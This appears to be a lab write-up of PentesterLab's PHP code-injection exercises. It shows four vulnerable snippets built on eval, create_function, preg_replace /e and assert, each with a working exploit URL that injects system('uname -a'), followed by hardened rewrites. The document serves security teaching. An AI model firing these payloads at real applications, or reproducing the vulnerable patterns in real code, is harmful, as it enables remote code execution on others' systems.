Pentestlab--Web for Pentester - Code Injection

Web for Pentester: This exercise is a set of the most common web vulnerabilities.

Difficulty: 1/5

Pentester lab: Code executions come from a lack of filtering and/or escaping of user-controlled data. When you are exploiting a code injection, you will need to inject code within the information you are sending to the application. For example, if you want to run the command ls, you will need to send system("ls") to the application since it is a PHP application.

Example 1

code review:

example1.php

<?php
  // user-controlled $_GET['name'] is concatenated straight into PHP source
  $str="echo \"Hello ".$_GET['name']."!!!\";";

  // the assembled string is then evaluated as code
  eval($str);
?>

The developer uses the function eval to echo the name. However, the developer doesn't filter the input of the eval function. By using concatenation ., I can add code after the input and use # to comment out the rest of the code.

manual exploit:

http://192.168.79.162/codeexec/example1.php?name=hacker".system('uname -a');#

The payload hacker".system('uname -a');# needs to be URL encoded.

Example 2

code review:

example2.php

<?php
  // $sql and the User class are defined earlier in the file (not shown here)
  $order = $_GET["order"];
  $result = mysql_query($sql);
  if ($result) {
      while ($row = mysql_fetch_assoc($result)) {
      $users[] = new User($row['id'],$row['name'],$row['age']);
    }
    if (isset($order)) {
      // $order is spliced into the body of a dynamically created function
      usort($users, create_function('$a, $b', 'return strcmp($a->'.$order.',$b->'.$order.');'));
    }
  }

From Pentesterlab:

The function usort is often used with the function create_function to dynamically generate the “sorting” function, based on user-controlled information. If the web application lacks potent filtering and validation, this can lead to code execution.

manual exploit:

http://192.168.79.162/codeexec/example2.php?order=id);}system('uname -a');#

Example 3

code review:

example3.php

<?php
  // pattern, replacement and subject are all user-controlled
  echo preg_replace($_GET["pattern"], $_GET["new"], $_GET["base"]);
?>

From Pentesterlab:

We talked earlier about regular expression modifiers with multi-line regular expression. Another very dangerous modifier exists in PHP: PCRE_REPLACE_EVAL (/e). This modifier will cause the function preg_replace to evaluate the new value as PHP code, before performing the substitution.

manual exploit:

http://192.168.79.162/codeexec/example3.php?new=system('uname%20-a')&pattern=/lamer/e&base=Hello lamer

Example 4

code review:

example4.php

<?php
// a string built from $_GET['name'] is passed to assert(), which evaluates it
assert(trim("'".$_GET['name']."'"));
echo "Hello ".htmlentities($_GET['name']);

From Pentesterlab:

This example is based on the function assert. When used incorrectly, this function will evaluate the value received. This behaviour can be used to gain code execution.

manual exploit:

http://192.168.79.162/codeexec/example4.php?name=hacker'.system('uname -a').'
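All four snippets share one root cause: user input reaches a PHP primitive that evaluates strings as code (eval, create_function, preg_replace with /e, assert). As an added example, not part of this write-up or the Pentesterlab code, here is a hardened rewrite of each that removes the evaluation primitive instead of trying to filter what reaches it; the function names and the allow-list of sortable columns are my own assumptions.

```php
<?php
// Hardened rewrites of the four Pentesterlab snippets (added example, not the lab's own fixes).

// Example 1: no eval() is needed to greet a user; escape the value on output instead.
function greet(string $name): string {
    return "Hello " . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . "!!!";
}

// Example 2: let the caller pick a sort column, but only from a fixed allow-list,
// and use a closure rather than create_function() (deprecated in 7.2, removed in PHP 8).
function sortUsers(array $users, ?string $order): array {
    $allowed = ['id', 'name', 'age'];                 // assumed set of sortable columns
    if ($order === null || !in_array($order, $allowed, true)) {
        return $users;                                // unknown column: ignore it, never evaluate it
    }
    usort($users, function ($a, $b) use ($order) {
        return strcmp((string) $a->$order, (string) $b->$order);
    });
    return $users;
}

// Example 3: the caller must never supply the pattern (that is where the /e modifier lived).
// Treat the search term as a literal; if a regex is unavoidable, build it with preg_quote().
function replaceLiteral(string $search, string $new, string $base): string {
    return str_replace($search, $new, $base);
}

// Example 4: assert() must never receive a string built from input; validate the value instead.
function validateName(string $name): string {
    if (!preg_match('/^[A-Za-z0-9 _-]{1,40}$/', $name)) {
        throw new InvalidArgumentException('invalid name');
    }
    return $name;
}

// Constructed usage
echo greet('<hacker>') . "\n";                       // tags are escaped, nothing is evaluated
echo replaceLiteral('lamer', 'friend', 'Hello lamer') . "\n";
echo validateName('hacker') . "\n";
```

On PHP 7.0 and later preg_replace rejects the /e modifier outright, and PHP 8 removes string evaluation from assert() and drops create_function(), so only the eval() pattern from Example 1 still works unchanged on current interpreters.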